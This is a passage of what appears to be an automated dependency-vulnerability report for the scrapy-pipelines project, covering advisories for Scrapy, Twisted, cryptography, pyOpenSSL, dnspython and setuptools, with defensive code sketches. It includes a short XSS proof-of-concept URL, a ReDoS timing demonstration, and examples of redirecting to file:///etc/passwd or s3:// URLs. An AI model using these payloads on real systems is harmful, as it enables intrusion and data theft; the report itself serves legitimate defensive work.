c) Redirect to any s3:// URL to read its content using the S3 credentials configured in the spider or project.
A spider that always outputs the entire contents of a response would be completely vulnerable.
A spider that extracts only fragments from the response could significantly limit the exposed data.
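The core of the fix is to refuse redirect targets outside the http/https schemes. That check can be sketched as a standalone function (names are illustrative, not Scrapy's internal API):

```python
from urllib.parse import urlparse

# Schemes a crawler should be willing to follow redirects to.
ALLOWED_REDIRECT_SCHEMES = {"http", "https"}

def is_safe_redirect(location: str) -> bool:
    """Allow a redirect target only if it uses an http(s) scheme."""
    return urlparse(location).scheme.lower() in ALLOWED_REDIRECT_SCHEMES

is_safe_redirect("https://example.com/next")   # True
is_safe_redirect("file:///etc/passwd")         # False
is_safe_redirect("s3://bucket/secret-object")  # False
```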
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
References
medium severity
new
- Vulnerable module: cryptography
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › cryptography@45.0.7
Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0 › cryptography@45.0.7
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › service-identity@21.1.0 › cryptography@45.0.7
Overview
Affected versions of this package are vulnerable to Improper Certificate Validation through the NameChain DNS verification logic in src/rust/cryptography-x509-verification. An attacker can make a peer name, such as bar.example.com, validate against a wildcard leaf certificate like *.example.com even when an issuing certificate in the chain excludes that DNS subtree, causing improper certificate acceptance.
Notes
- The flaw affects X.509 path validation when DNS name constraints are present, and the leaf certificate uses a wildcard DNS SAN.
- The maintainers note that ordinary X.509 topologies, including those used by the Web PKI, are not affected, and exploitation requires an uncommon certificate hierarchy.
Remediation
Upgrade cryptography to version 46.0.6 or higher.
References
medium severity
new
- Vulnerable module: pyopenssl
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › pyopenssl@25.3.0
Remediation: Upgrade to scrapy@2.4.1.
Overview
Affected versions of this package are vulnerable to Not Failing Securely ('Failing Open') via the set_tlsext_servername_callback function. An attacker can bypass security-sensitive checks by causing an unhandled exception in the callback, which results in the connection being accepted. If a user was relying on this callback for any security-sensitive behavior, this could allow bypassing it.
Remediation
Upgrade pyopenssl to version 26.0.0 or higher.
References
medium severity
- Vulnerable module: dnspython
- Introduced through: txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › pymongo@4.7.3 › dnspython@2.3.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Incorrect Behavior Order in the DNS pre-processing pipeline, which allows an off-path attacker who can spoof the source IP address of a malformed DNS response packet to cause denial of service. The UDP processing functions in query.py and asyncquery.py accept the first-arriving packet before closing the receiving socket, allowing the attacker to make the remote nameserver appear unavailable for the target resolver and clients.
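The patched behavior amounts to discarding non-matching datagrams rather than failing on the first packet received. A simplified sketch of that acceptance logic (not dnspython's actual code; the Packet shape is illustrative):

```python
from typing import Iterable, Optional, Tuple

# (source address, DNS transaction id, raw payload) -- illustrative shape
Packet = Tuple[Tuple[str, int], int, bytes]

def first_valid_reply(packets: Iterable[Packet],
                      expected_addr: Tuple[str, int],
                      expected_id: int) -> Optional[bytes]:
    """Return the first reply from the queried server with our transaction id.

    Spoofed or malformed datagrams are skipped instead of aborting the
    query, so an off-path attacker's packet cannot mask the real answer.
    """
    for addr, qid, payload in packets:
        if addr == expected_addr and qid == expected_id:
            return payload
    return None
```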
Remediation
Upgrade dnspython to version 2.6.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor due to improper handling of HTTP headers during cross-origin redirects. An attacker can intercept the Authorization header and potentially access sensitive information by exploiting this misconfiguration in redirect scenarios where the domain remains the same but the scheme or port changes.
Note: In the context of a man-in-the-middle attack, this could be used to get access to the value of that Authorization header.
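The fix drops the Authorization header whenever a redirect crosses origins, where origin means the (scheme, host, port) triple. A standalone sketch of that rule (function names are illustrative, not Scrapy's internals):

```python
from urllib.parse import urlparse

def same_origin(url_a: str, url_b: str) -> bool:
    """Compare (scheme, host, port), filling in default ports."""
    defaults = {"http": 80, "https": 443}
    a, b = urlparse(url_a), urlparse(url_b)
    return (a.scheme, a.hostname, a.port or defaults.get(a.scheme)) == \
           (b.scheme, b.hostname, b.port or defaults.get(b.scheme))

def headers_for_redirect(headers: dict, from_url: str, to_url: str) -> dict:
    """Drop Authorization unless the redirect stays on the same origin."""
    if same_origin(from_url, to_url):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() != "authorization"}
```

Note that a redirect from https://example.com to http://example.com changes the scheme (and implicitly the port), so it is treated as cross-origin even though the domain is unchanged.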
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.6.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure in which a spider could leak cookie headers when being forwarded to a third party, potentially attacker-controlled website.
Remediation
Upgrade Scrapy to version 2.6.0 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via a crafted HTML package or custom PackageIndex page.
Note:
Only a small portion of the user base is impacted by this flaw. Setuptools maintainers pointed out that package_index is deprecated (not formally, but “in spirit”) and the vulnerability isn't reachable through standard, recommended workflows.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A — The string must start with the letter 'A'.
- (B|C+)+ — The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D — Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing a valid 30-character string takes around 52ms. But when given an invalid string of the same length, the test takes nearly two seconds to complete, roughly 35 times as long. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above). An attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.
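The same blow-up can be reproduced with Python's backtracking re engine. This sketch times a matching and a non-matching input of equal length (22 C's keeps the failing case slow enough to observe but quick enough to run):

```python
import re
import time

def match_time(pattern: str, text: str) -> float:
    """Time a single re.match call in seconds."""
    start = time.perf_counter()
    re.match(pattern, text)
    return time.perf_counter() - start

pattern = r'A(B|C+)+D'
ok = match_time(pattern, 'A' + 'C' * 22 + 'D')   # matches: near-instant
bad = match_time(pattern, 'A' + 'C' * 22 + 'X')  # fails only after exhaustive backtracking
# Each additional 'C' roughly doubles the running time of the failing case.
```

On CPython the failing match takes orders of magnitude longer than the successful one. Python 3.11's atomic groups and possessive quantifiers, or the third-party regex module, are common mitigations for patterns like this.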
Remediation
Upgrade setuptools to version 65.5.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.5.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure. If you use HttpAuthMiddleware (i.e. the http_user and http_pass spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. This includes requests generated by Scrapy components, such as robots.txt requests sent by Scrapy when the ROBOTSTXT_OBEY setting is set to True, or as requests reached through redirects.
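Scrapy 2.5.1 addresses this with an http_auth_domain spider attribute that scopes the credentials to one domain. A simplified sketch of that scoping decision (not Scrapy's actual implementation):

```python
def should_send_credentials(request_host: str, auth_domain: str) -> bool:
    """Send HTTP auth credentials only to the configured domain and its
    subdomains, rather than to every request the spider makes."""
    host, domain = request_host.lower(), auth_domain.lower()
    return host == domain or host.endswith("." + domain)
```

With auth_domain set to example.com, requests to api.example.com still carry credentials, while redirects to third-party hosts do not.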
Remediation
Upgrade Scrapy to version 1.8.1, 2.5.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.6.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Credential Exposure via the process_request() function in downloadermiddlewares/httpproxy.py. A proxy can leak credentials to another proxy if third-party downloader middlewares leave Proxy-Authentication headers unchanged when updating proxy metadata for a new request.
NOTE: To fully mitigate the effects of the vulnerability, replacing or upgrading the third-party downloader middleware might be necessary after upgrading.
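The underlying rule is that Proxy-Authorization credentials must never follow a request to a different proxy. A standalone sketch of that check (names are illustrative, not Scrapy's middleware API):

```python
def headers_for_new_proxy(headers: dict, old_proxy: str, new_proxy: str) -> dict:
    """Drop Proxy-Authorization when the proxy changes, so credentials
    meant for one proxy are never replayed to another."""
    if old_proxy == new_proxy:
        return dict(headers)
    return {k: v for k, v in headers.items()
            if k.lower() != "proxy-authorization"}
```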
Remediation
Upgrade Scrapy to version 1.8.3, 2.6.2 or higher.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as only HTTP/1.x traffic is affected.
Remediation
Upgrade Twisted to version 23.10.0rc1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Overview
Affected versions of this package are vulnerable to excessive memory consumption via S3FilesStore. Files are stored in memory before being uploaded to S3, increasing memory usage if large files, or many files at once, are being uploaded.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0
Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0
Remediation: Upgrade to txmongo@24.0.0.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when the victim is using Firefox, due to an unescaped URL in the redirectTo() function. A site which is vulnerable to open redirects by other means can be made to execute scripts injected into a redirect URL.
PoC
http://127.0.0.1:9009?url=ws://example.com/"><script>alert(document.location)</script>
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself they are used for HTML tags. If malicious content is injected into an application that escapes special characters, and that malicious content uses < and > as HTML tags, those characters are not interpreted as HTML tags by the browser if they have been correctly escaped in the application code, and in this way the attempted attack is diverted.
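In Python, this escaping is available out of the box via html.escape, which neutralizes a payload like the PoC above:

```python
from html import escape

payload = '<script>alert(document.location)</script>'
safe = escape(payload)
# safe == '&lt;script&gt;alert(document.location)&lt;/script&gt;'
```

escape also handles & and, by default, single and double quotes, so it is safe for attribute values as well as text content.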
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | Client | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
- Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade Twisted to version 24.7.0rc1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to URL Redirection to Untrusted Site ('Open Redirect') due to the improper handling of scheme-specific proxy settings during HTTP redirects. An attacker can potentially intercept sensitive information by exploiting the failure to switch proxies when redirected from HTTP to HTTPS URLs or vice versa.
Remediation
Upgrade Scrapy to version 2.11.2 or higher.